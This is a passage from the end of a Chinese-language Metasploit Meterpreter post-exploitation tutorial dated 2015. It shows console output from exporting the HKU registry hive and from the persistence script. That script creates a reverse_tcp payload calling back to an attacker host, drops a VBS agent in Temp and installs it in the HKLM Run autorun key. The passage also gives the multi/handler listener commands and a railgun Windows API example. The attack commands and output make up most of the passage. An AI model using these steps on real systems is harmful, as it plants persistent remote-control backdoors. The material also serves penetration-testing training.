[*]  Exporting HKU
[*]  Downloading HKU (C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Vwvxmugh.reg)
[*]  Cleaning HKU
[*] Completed processing on 172.16.244.136:1114...

t01d683cba9ba3e836a.jpg

 

控制持久化

meterpreter > run persistence -X -i 20 3376 -r 172.16.244.129
[*] Running Persistance Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/SPRITEKI-674621_20150315.5511/SPRITEKI-674621_20150315.5511.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=172.16.244.129 LPORT=4444
[*] Persistent agent script is 609466 bytes long
[+] Persistent Script written to C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\lBsbPnkcYJvv.vbs
[*] Executing script C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\lBsbPnkcYJvv.vbs
[+] Agent executed with PID 1112
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ShFzEOxwbuI
[+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ShFzEOxwbuI

t01da59aa8ef64c6f68.jpg

use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST
set LPOTR
exploit

在meterpreter下使用Windows API编程,以弹Hello world窗示例

meterpreter > irb
[*] Starting IRB shell
[*] The 'client' variable holds the meterpreter client
>> client.railgun.user32.MessageBoxA(0,"hello","world","MB_OK")

 

t01fcddd6d2070edf15.jpg

 

0x05更多Meterpreter的命令

参考:

Meterpreter后渗透攻击命令

Metasploit工具Meterpreter的命令速查表

0x06感谢

感谢全能Mickey牛和玄大:玄魂

雪碧 http://weibo.com/520613815

2015-03-19

原文:

http://bobao.360.cn/learning/detail/300.html

http://bobao.360.cn/learning/detail/312.html